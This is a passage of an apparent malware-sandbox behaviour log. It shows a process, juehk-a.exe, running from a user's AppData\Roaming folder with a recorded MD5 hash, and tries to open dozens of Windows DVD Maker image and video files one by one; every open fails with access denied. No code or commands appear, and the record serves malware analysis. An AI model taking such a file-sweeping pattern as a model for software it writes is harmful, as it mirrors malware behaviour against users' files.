25687.          value: C:\Program Files\DVD Maker\Shared\DissolveAnother.png
25688.          processinfo:
25689.            pid: 1648
25690.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25691.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25692.            ads:
25693.          fid (ads:): 0
25694.          failure: open
25695.          ntstatus: 0xc0000022
25696.          CreateOptions: 0x60
25697.        file:
25698.          timestamp: 90230
25699.          mode: failed
25700.          sequenceNumber: 1813
25701.          value: C:\Program Files\DVD Maker\Shared\DissolveNoise.png
25702.          processinfo:
25703.            pid: 1648
25704.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25705.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25706.            ads:
25707.          fid (ads:): 0
25708.          failure: open
25709.          ntstatus: 0xc0000022
25710.          CreateOptions: 0x60
25711.        file:
25712.          timestamp: 90250
25713.          mode: failed
25714.          sequenceNumber: 1814
25715.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_Buttongraphic.png
25716.          processinfo:
25717.            pid: 1648
25718.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25719.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25720.            ads:
25721.          fid (ads:): 0
25722.          failure: open
25723.          ntstatus: 0xc0000022
25724.          CreateOptions: 0x60
25725.        file:
25726.          timestamp: 90256
25727.          mode: failed
25728.          sequenceNumber: 1815
25729.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_SelectionSubpicture.png
25730.          processinfo:
25731.            pid: 1648
25732.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25733.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25734.            ads:
25735.          fid (ads:): 0
25736.          failure: open
25737.          ntstatus: 0xc0000022
25738.          CreateOptions: 0x60
25739.        file:
25740.          timestamp: 90262
25741.          mode: failed
25742.          sequenceNumber: 1816
25743.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_VideoInset.png
25744.          processinfo:
25745.            pid: 1648
25746.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25747.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25748.            ads:
25749.          fid (ads:): 0
25750.          failure: open
25751.          ntstatus: 0xc0000022
25752.          CreateOptions: 0x60
25753.        file:
25754.          timestamp: 90272
25755.          mode: failed
25756.          sequenceNumber: 1817
25757.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_Buttongraphic.png
25758.          processinfo:
25759.            pid: 1648
25760.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25761.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25762.            ads:
25763.          fid (ads:): 0
25764.          failure: open
25765.          ntstatus: 0xc0000022
25766.          CreateOptions: 0x60
25767.        file:
25768.          timestamp: 90276
25769.          mode: failed
25770.          sequenceNumber: 1818
25771.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_SelectionSubpicture.png
25772.          processinfo:
25773.            pid: 1648
25774.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25775.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25776.            ads:
25777.          fid (ads:): 0
25778.          failure: open
25779.          ntstatus: 0xc0000022
25780.          CreateOptions: 0x60
25781.        file:
25782.          timestamp: 90283
25783.          mode: failed
25784.          sequenceNumber: 1819
25785.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_VideoInset.png
25786.          processinfo:
25787.            pid: 1648
25788.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25789.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25790.            ads:
25791.          fid (ads:): 0
25792.          failure: open
25793.          ntstatus: 0xc0000022
25794.          CreateOptions: 0x60
25795.        file:
25796.          timestamp: 90290
25797.          mode: failed
25798.          sequenceNumber: 1820
25799.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\babyblue.png
25800.          processinfo:
25801.            pid: 1648
25802.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25803.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25804.            ads:
25805.          fid (ads:): 0
25806.          failure: open
25807.          ntstatus: 0xc0000022
25808.          CreateOptions: 0x60
25809.        file:
25810.          timestamp: 90297
25811.          mode: failed
25812.          sequenceNumber: 1821
25813.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv
25814.          processinfo:
25815.            pid: 1648
25816.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25817.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25818.            ads:
25819.          fid (ads:): 0
25820.          failure: open
25821.          ntstatus: 0xc0000022
25822.          CreateOptions: 0x60
25823.        file:
25824.          timestamp: 90303
25825.          mode: failed
25826.          sequenceNumber: 1822
25827.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground_PAL.wmv
25828.          processinfo:
25829.            pid: 1648
25830.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25831.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25832.            ads:
25833.          fid (ads:): 0
25834.          failure: open
25835.          ntstatus: 0xc0000022
25836.          CreateOptions: 0x60
25837.        file:
25838.          timestamp: 90310
25839.          mode: failed
25840.          sequenceNumber: 1823
25841.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground.wmv
25842.          processinfo:
25843.            pid: 1648
25844.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25845.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25846.            ads:
25847.          fid (ads:): 0
25848.          failure: open
25849.          ntstatus: 0xc0000022
25850.          CreateOptions: 0x60
25851.        file:
25852.          timestamp: 90318
25853.          mode: failed
25854.          sequenceNumber: 1824
25855.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground_PAL.wmv
25856.          processinfo:
25857.            pid: 1648
25858.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25859.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25860.            ads:
25861.          fid (ads:): 0
25862.          failure: open
25863.          ntstatus: 0xc0000022
25864.          CreateOptions: 0x60
25865.        file:
25866.          timestamp: 90325
25867.          mode: failed
25868.          sequenceNumber: 1825
25869.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv
25870.          processinfo:
25871.            pid: 1648
25872.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25873.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25874.            ads:
25875.          fid (ads:): 0
25876.          failure: open
25877.          ntstatus: 0xc0000022
25878.          CreateOptions: 0x60
25879.        file:
25880.          timestamp: 90333
25881.          mode: failed
25882.          sequenceNumber: 1826
25883.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground_PAL.wmv
25884.          processinfo:
25885.            pid: 1648
25886.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25887.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25888.            ads:
25889.          fid (ads:): 0
25890.          failure: open
25891.          ntstatus: 0xc0000022
25892.          CreateOptions: 0x60
25893.        file:
25894.          timestamp: 90340
25895.          mode: failed
25896.          sequenceNumber: 1827
25897.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground.wmv
25898.          processinfo:
25899.            pid: 1648
25900.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25901.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25902.            ads:
25903.          fid (ads:): 0
25904.          failure: open
25905.          ntstatus: 0xc0000022
25906.          CreateOptions: 0x60
25907.        file:
25908.          timestamp: 90348
25909.          mode: failed
25910.          sequenceNumber: 1828
25911.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground_PAL.wmv
25912.          processinfo:
25913.            pid: 1648
25914.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25915.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25916.            ads:
25917.          fid (ads:): 0
25918.          failure: open
25919.          ntstatus: 0xc0000022
25920.          CreateOptions: 0x60
25921.        file:
25922.          timestamp: 90355
25923.          mode: failed
25924.          sequenceNumber: 1829
25925.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground.wmv
25926.          processinfo:
25927.            pid: 1648
25928.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25929.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25930.            ads:
25931.          fid (ads:): 0
25932.          failure: open
25933.          ntstatus: 0xc0000022
25934.          CreateOptions: 0x60
25935.        file:
25936.          timestamp: 90375
25937.          mode: failed
25938.          sequenceNumber: 1830
25939.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground_PAL.wmv
25940.          processinfo:
25941.            pid: 1648
25942.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25943.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25944.            ads:
25945.          fid (ads:): 0
25946.          failure: open
25947.          ntstatus: 0xc0000022
25948.          CreateOptions: 0x60
25949.        file:
25950.          timestamp: 90382
25951.          mode: failed
25952.          sequenceNumber: 1831
25953.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\LightBlueRectangle.PNG
25954.          processinfo:
25955.            pid: 1648
25956.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25957.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25958.            ads:
25959.          fid (ads:): 0
25960.          failure: open
25961.          ntstatus: 0xc0000022
25962.          CreateOptions: 0x60
25963.        file:
25964.          timestamp: 90390
25965.          mode: failed
25966.          sequenceNumber: 1832
25967.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\MainMenuButtonIcon.png
25968.          processinfo:
25969.            pid: 1648
25970.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25971.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25972.            ads:
25973.          fid (ads:): 0
25974.          failure: open
25975.          ntstatus: 0xc0000022
25976.          CreateOptions: 0x60
25977.        file:
25978.          timestamp: 90397
25979.          mode: failed
25980.          sequenceNumber: 1833
25981.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\navSubpicture.png
25982.          processinfo:
25983.            pid: 1648
25984.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25985.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
25986.            ads:
25987.          fid (ads:): 0
25988.          failure: open
25989.          ntstatus: 0xc0000022
25990.          CreateOptions: 0x60
25991.        file:
25992.          timestamp: 90403
25993.          mode: failed
25994.          sequenceNumber: 1834
25995.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png
25996.          processinfo:
25997.            pid: 1648
25998.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
25999.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26000.            ads:
26001.          fid (ads:): 0
26002.          failure: open
26003.          ntstatus: 0xc0000022
26004.          CreateOptions: 0x60
26005.        file:
26006.          timestamp: 90410
26007.          mode: failed
26008.          sequenceNumber: 1835
26009.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_rightarrow.png
26010.          processinfo:
26011.            pid: 1648
26012.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26013.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26014.            ads:
26015.          fid (ads:): 0
26016.          failure: open
26017.          ntstatus: 0xc0000022
26018.          CreateOptions: 0x60
26019.        file:
26020.          timestamp: 90418
26021.          mode: failed
26022.          sequenceNumber: 1836
26023.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_uparrow.png
26024.          processinfo:
26025.            pid: 1648
26026.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26027.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26028.            ads:
26029.          fid (ads:): 0
26030.          failure: open
26031.          ntstatus: 0xc0000022
26032.          CreateOptions: 0x60
26033.        file:
26034.          timestamp: 90427
26035.          mode: failed
26036.          sequenceNumber: 1837
26037.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-background.png
26038.          processinfo:
26039.            pid: 1648
26040.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26041.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26042.            ads:
26043.          fid (ads:): 0
26044.          failure: open
26045.          ntstatus: 0xc0000022
26046.          CreateOptions: 0x60
26047.        file:
26048.          timestamp: 90434
26049.          mode: failed
26050.          sequenceNumber: 1838
26051.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-highlight.png
26052.          processinfo:
26053.            pid: 1648
26054.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26055.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26056.            ads:
26057.          fid (ads:): 0
26058.          failure: open
26059.          ntstatus: 0xc0000022
26060.          CreateOptions: 0x60
26061.        file:
26062.          timestamp: 90441
26063.          mode: failed
26064.          sequenceNumber: 1839
26065.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-image-mask.png
26066.          processinfo:
26067.            pid: 1648
26068.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26069.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26070.            ads:
26071.          fid (ads:): 0
26072.          failure: open
26073.          ntstatus: 0xc0000022
26074.          CreateOptions: 0x60
26075.        file:
26076.          timestamp: 90448
26077.          mode: failed
26078.          sequenceNumber: 1840
26079.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\babypink.png
26080.          processinfo:
26081.            pid: 1648
26082.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26083.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26084.            ads:
26085.          fid (ads:): 0
26086.          failure: open
26087.          ntstatus: 0xc0000022
26088.          CreateOptions: 0x60
26089.        file:
26090.          timestamp: 90454
26091.          mode: failed
26092.          sequenceNumber: 1841
26093.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\background.png
26094.          processinfo:
26095.            pid: 1648
26096.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26097.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26098.            ads:
26099.          fid (ads:): 0
26100.          failure: open
26101.          ntstatus: 0xc0000022
26102.          CreateOptions: 0x60
26103.        file:
26104.          timestamp: 90462
26105.          mode: failed
26106.          sequenceNumber: 1842
26107.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\bear_formatted_matte2.wmv
26108.          processinfo:
26109.            pid: 1648
26110.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26111.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26112.            ads:
26113.          fid (ads:): 0
26114.          failure: open
26115.          ntstatus: 0xc0000022
26116.          CreateOptions: 0x60
26117.        file:
26118.          timestamp: 90469
26119.          mode: failed
26120.          sequenceNumber: 1843
26121.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\Bear_Formatted_MATTE2_PAL.wmv
26122.          processinfo:
26123.            pid: 1648
26124.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26125.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26126.            ads:
26127.          fid (ads:): 0
26128.          failure: open
26129.          ntstatus: 0xc0000022
26130.          CreateOptions: 0x60
26131.        file:
26132.          timestamp: 90476
26133.          mode: failed
26134.          sequenceNumber: 1844
26135.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\bear_formatted_rgb6.wmv
26136.          processinfo:
26137.            pid: 1648
26138.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26139.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26140.            ads:
26141.          fid (ads:): 0
26142.          failure: open
26143.          ntstatus: 0xc0000022
26144.          CreateOptions: 0x60
26145.        file:
26146.          timestamp: 90483
26147.          mode: failed
26148.          sequenceNumber: 1845
26149.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\Bear_Formatted_RGB6_PAL.wmv
26150.          processinfo:
26151.            pid: 1648
26152.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26153.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26154.            ads:
26155.          fid (ads:): 0
26156.          failure: open
26157.          ntstatus: 0xc0000022
26158.          CreateOptions: 0x60
26159.        file:
26160.          timestamp: 90490
26161.          mode: failed
26162.          sequenceNumber: 1846
26163.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-back-static.png
26164.          processinfo:
26165.            pid: 1648
26166.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26167.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26168.            ads:
26169.          fid (ads:): 0
26170.          failure: open
26171.          ntstatus: 0xc0000022
26172.          CreateOptions: 0x60
26173.        file:
26174.          timestamp: 90497
26175.          mode: failed
26176.          sequenceNumber: 1847
26177.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-next-static.png
26178.          processinfo:
26179.            pid: 1648
26180.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26181.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26182.            ads:
26183.          fid (ads:): 0
26184.          failure: open
26185.          ntstatus: 0xc0000022
26186.          CreateOptions: 0x60
26187.        file:
26188.          timestamp: 90504
26189.          mode: failed
26190.          sequenceNumber: 1848
26191.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-previous-static.png
26192.          processinfo:
26193.            pid: 1648
26194.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26195.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26196.            ads:
26197.          fid (ads:): 0
26198.          failure: open
26199.          ntstatus: 0xc0000022
26200.          CreateOptions: 0x60
26201.        file:
26202.          timestamp: 90510
26203.          mode: failed
26204.          sequenceNumber: 1849
26205.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\button-highlight.png
26206.          processinfo:
26207.            pid: 1648
26208.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26209.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26210.            ads:
26211.          fid (ads:): 0
26212.          failure: open
26213.          ntstatus: 0xc0000022
26214.          CreateOptions: 0x60
26215.        file:
26216.          timestamp: 90517
26217.          mode: failed
26218.          sequenceNumber: 1850
26219.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\chapters-static.png
26220.          processinfo:
26221.            pid: 1648
26222.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26223.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26224.            ads:
26225.          fid (ads:): 0
26226.          failure: open
26227.          ntstatus: 0xc0000022
26228.          CreateOptions: 0x60
26229.        file:
26230.          timestamp: 90524
26231.          mode: failed
26232.          sequenceNumber: 1851
26233.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\content-background.png
26234.          processinfo:
26235.            pid: 1648
26236.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26237.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26238.            ads:
26239.          fid (ads:): 0
26240.          failure: open
26241.          ntstatus: 0xc0000022
26242.          CreateOptions: 0x60
26243.        file:
26244.          timestamp: 90530
26245.          mode: failed
26246.          sequenceNumber: 1852
26247.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\content-foreground.png
26248.          processinfo:
26249.            pid: 1648
26250.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26251.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26252.            ads:
26253.          fid (ads:): 0
26254.          failure: open
26255.          ntstatus: 0xc0000022
26256.          CreateOptions: 0x60
26257.        file:
26258.          timestamp: 90535
26259.          mode: failed
26260.          sequenceNumber: 1853
26261.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\curtains.png
26262.          processinfo:
26263.            pid: 1648
26264.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26265.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26266.            ads:
26267.          fid (ads:): 0
26268.          failure: open
26269.          ntstatus: 0xc0000022
26270.          CreateOptions: 0x60
26271.        file:
26272.          timestamp: 90542
26273.          mode: failed
26274.          sequenceNumber: 1854
26275.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv
26276.          processinfo:
26277.            pid: 1648
26278.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26279.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26280.            ads:
26281.          fid (ads:): 0
26282.          failure: open
26283.          ntstatus: 0xc0000022
26284.          CreateOptions: 0x60
26285.        file:
26286.          timestamp: 90548
26287.          mode: failed
26288.          sequenceNumber: 1855
26289.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_PreComp_MATTE_PAL.wmv
26290.          processinfo:
26291.            pid: 1648
26292.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26293.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26294.            ads:
26295.          fid (ads:): 0
26296.          failure: open
26297.          ntstatus: 0xc0000022
26298.          CreateOptions: 0x60
26299.        file:
26300.          timestamp: 90554
26301.          mode: failed
26302.          sequenceNumber: 1856
26303.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_matte.wmv
26304.          processinfo:
26305.            pid: 1648
26306.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26307.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26308.            ads:
26309.          fid (ads:): 0
26310.          failure: open
26311.          ntstatus: 0xc0000022
26312.          CreateOptions: 0x60
26313.        file:
26314.          timestamp: 90561
26315.          mode: failed
26316.          sequenceNumber: 1857
26317.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_MATTE_PAL.wmv
26318.          processinfo:
26319.            pid: 1648
26320.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26321.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26322.            ads:
26323.          fid (ads:): 0
26324.          failure: open
26325.          ntstatus: 0xc0000022
26326.          CreateOptions: 0x60
26327.        file:
26328.          timestamp: 90566
26329.          mode: failed
26330.          sequenceNumber: 1858
26331.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_rgb.wmv
26332.          processinfo:
26333.            pid: 1648
26334.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26335.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26336.            ads:
26337.          fid (ads:): 0
26338.          failure: open
26339.          ntstatus: 0xc0000022
26340.          CreateOptions: 0x60
26341.        file:
26342.          timestamp: 90573
26343.          mode: failed
26344.          sequenceNumber: 1859
26345.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_RGB_PAL.wmv
26346.          processinfo:
26347.            pid: 1648
26348.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26349.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26350.            ads:
26351.          fid (ads:): 0
26352.          failure: open
26353.          ntstatus: 0xc0000022
26354.          CreateOptions: 0x60
26355.        file:
26356.          timestamp: 90579
26357.          mode: failed
26358.          sequenceNumber: 1860
26359.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\highlight.png
26360.          processinfo:
26361.            pid: 1648
26362.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26363.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26364.            ads:
26365.          fid (ads:): 0
26366.          failure: open
26367.          ntstatus: 0xc0000022
26368.          CreateOptions: 0x60
26369.        file:
26370.          timestamp: 90585
26371.          mode: failed
26372.          sequenceNumber: 1861
26373.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\mainimage-mask.png
26374.          processinfo:
26375.            pid: 1648
26376.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26377.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26378.            ads:
26379.          fid (ads:): 0
26380.          failure: open
26381.          ntstatus: 0xc0000022
26382.          CreateOptions: 0x60
26383.        file:
26384.          timestamp: 90591
26385.          mode: failed
26386.          sequenceNumber: 1862
26387.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\notes-static.png
26388.          processinfo:
26389.            pid: 1648
26390.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26391.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26392.            ads:
26393.          fid (ads:): 0
26394.          failure: open
26395.          ntstatus: 0xc0000022
26396.          CreateOptions: 0x60
26397.        file:
26398.          timestamp: 90597
26399.          mode: failed
26400.          sequenceNumber: 1863
26401.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\play-static.png
26402.          processinfo:
26403.            pid: 1648
26404.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26405.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26406.            ads:
26407.          fid (ads:): 0
26408.          failure: open
26409.          ntstatus: 0xc0000022
26410.          CreateOptions: 0x60
26411.        file:
26412.          timestamp: 90605
26413.          mode: failed
26414.          sequenceNumber: 1864
26415.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\circleround_glass.png
26416.          processinfo:
26417.            pid: 1648
26418.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26419.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26420.            ads:
26421.          fid (ads:): 0
26422.          failure: open
26423.          ntstatus: 0xc0000022
26424.          CreateOptions: 0x60
26425.        file:
26426.          timestamp: 90612
26427.          mode: failed
26428.          sequenceNumber: 1865
26429.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\circleround_selectionsubpicture.png
26430.          processinfo:
26431.            pid: 1648
26432.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26433.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26434.            ads:
26435.          fid (ads:): 0
26436.          failure: open
26437.          ntstatus: 0xc0000022
26438.          CreateOptions: 0x60
26439.        file:
26440.          timestamp: 90619
26441.          mode: failed
26442.          sequenceNumber: 1866
26443.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\circleround_videoinset.png
26444.          processinfo:
26445.            pid: 1648
26446.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26447.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26448.            ads:
26449.          fid (ads:): 0
26450.          failure: open
26451.          ntstatus: 0xc0000022
26452.          CreateOptions: 0x60
26453.        file:
26454.          timestamp: 90626
26455.          mode: failed
26456.          sequenceNumber: 1867
26457.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_ButtonGraphic.png
26458.          processinfo:
26459.            pid: 1648
26460.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26461.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26462.            ads:
26463.          fid (ads:): 0
26464.          failure: open
26465.          ntstatus: 0xc0000022
26466.          CreateOptions: 0x60
26467.        file:
26468.          timestamp: 90631
26469.          mode: failed
26470.          sequenceNumber: 1868
26471.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_SelectionSubpictureA.png
26472.          processinfo:
26473.            pid: 1648
26474.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26475.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26476.            ads:
26477.          fid (ads:): 0
26478.          failure: open
26479.          ntstatus: 0xc0000022
26480.          CreateOptions: 0x60
26481.        file:
26482.          timestamp: 90638
26483.          mode: failed
26484.          sequenceNumber: 1869
26485.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_SelectionSubpictureB.png
26486.          processinfo:
26487.            pid: 1648
26488.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26489.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26490.            ads:
26491.          fid (ads:): 0
26492.          failure: open
26493.          ntstatus: 0xc0000022
26494.          CreateOptions: 0x60
26495.        file:
26496.          timestamp: 90644
26497.          mode: failed
26498.          sequenceNumber: 1870
26499.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_VideoInset.png
26500.          processinfo:
26501.            pid: 1648
26502.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26503.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26504.            ads:
